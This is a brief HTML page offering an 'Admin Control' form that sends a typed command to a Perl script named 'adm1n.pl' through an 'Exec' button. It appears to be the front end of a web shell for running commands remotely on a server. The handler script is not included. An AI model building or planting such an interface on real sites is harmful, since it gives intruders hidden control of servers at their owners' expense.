<html><head>
<title>
Admin Script v1.0
</title>
<STYLE TYPE="text/css">
<!--
A:hover   {
  color: #C0C0C0;
  background: white;
  text-decoration:underline;
}
H1, H2, H3 {
  margin-left: 0%;
  color: #FFAA33;
 font-family: arial, verdana, helvetica, sans-serif;
}
-->
</STYLE>
<meta http-equiv=refresh content=600>
</head>
<body bgColor=#263C6D text="white" link="#ffffff" vlink="#C0C0C0" alink="#C0C0C0">
<font face="arial">
<h1>Admin Control</h1><br>
Enter command<br><br>
<FORM METHOD=POST ACTION="adm1n.pl">
<INPUT TYPE=text NAME="moo" SIZE=20>
<INPUT TYPE=submit VALUE="Exec">
</FORM>

<br>
</body>
</html>
